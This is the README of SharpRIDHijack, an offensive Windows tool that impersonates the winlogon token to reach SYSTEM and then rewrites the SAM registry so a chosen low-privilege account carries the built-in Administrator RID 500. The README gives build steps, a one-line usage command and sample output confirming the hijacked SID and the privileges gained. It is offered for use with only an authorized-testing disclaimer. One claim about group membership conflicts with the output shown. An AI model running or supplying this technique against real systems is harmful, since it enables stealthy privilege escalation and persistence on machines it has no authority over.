SharpRIDHijack
SharpRIDHijack is an offensive security tool designed for performing RID (Relative Identifier) hijacking on Windows systems. It escalates privileges by impersonating the SYSTEM account and modifying the SAM registry to assign an administrative RID to a specified user account.
WARNING: This tool is for authorized security testing only. Unauthorized use may violate laws and regulations. The author and contributors are not responsible for misuse. Always obtain explicit permission before testing any system.
Features
- Privilege Escalation: Escalates to SYSTEM by impersonating the winlogon process token.
- RID Hijacking: Modifies the SAM registry to assign an administrative RID (default: 500) to a target user.
Installation
Prerequisites
- .NET Framework: Version 4.7.2 or later.
- Visual Studio or MSBuild: For compiling the C# source code.
- Git: To clone the repository.
- Windows: Compatible with Windows 10/11 (other versions may require offset adjustments for SAM registry).
Steps
- Clone the repository:
PS C:\> git clone https://github.com/heqnx/SharpRIDHijack.git
PS C:\> cd SharpRIDHijack
-
Compile the source code with Visual Studio by opening
SharpRIDHijack.sln -
Alternatively, compile with MSBuild:
PS C:\> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe SharpRIDHijack.csproj
Usage
Command-Line Flags
- Run SharpRIDHijack.exe with a target username to perform RID hijacking. The tool requires administrative privileges.
PS C:\> Usage: SharpRIDHijack.exe <username>
Examples
Perform RID Hijacking via Command-Line
- Hijack the RID of the
lowprivuser to grant administrative privileges:
PS C:\> SharpRIDHijack.exe lowpriv
[inf] SeDebugPrivilege enabled
[inf] Successfully impersonated WinLogon, running as NT AUTHORITY\SYSTEM
[inf] Original RID: 000003EB (1003)
[inf] Original F value:
03 00 01 00 00 00 00 00 CB 5C 3B 54 CA B5 DB 01 00 00 00 00 00 00 00 00 F4 6D 86 48 CA B5 DB 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 EB 03 00 00 01 02 00 00 10 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00
[inf] Found RID 1003 at offset 48
[inf] New F value:
03 00 01 00 00 00 00 00 CB 5C 3B 54 CA B5 DB 01 00 00 00 00 00 00 00 00 F4 6D 86 48 CA B5 DB 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F4 01 00 00 01 02 00 00 10 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00
- Note the user is explicitly in the administrators group when checking with
net user:
PS C:\> net user lowpriv
User name lowpriv
...
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
- User does show up with an administrator RID and associated privileges:
PS C:\> whoami /user
USER INFORMATION
----------------
User Name SID
======================= ============================================
DESKTOP-C9VFZ4T\lowpriv S-1-5-21-1743776718-435079111-2757990620-500
PS C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== ========
...
SeRestorePrivilege Restore files and directories Disabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
...
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
...
Automated Releases
Check the GitHub Releases page for the new release with attached binaries.
License
This project is licensed under the GNU GENERAL PUBLIC LICENSE. See the LICENSE file for details.
Disclaimer
SharpRIDHijack is provided "as is" without warranty. The author and contributors are not liable for any damages or legal consequences arising from its use. Use responsibly and only in authorized environments.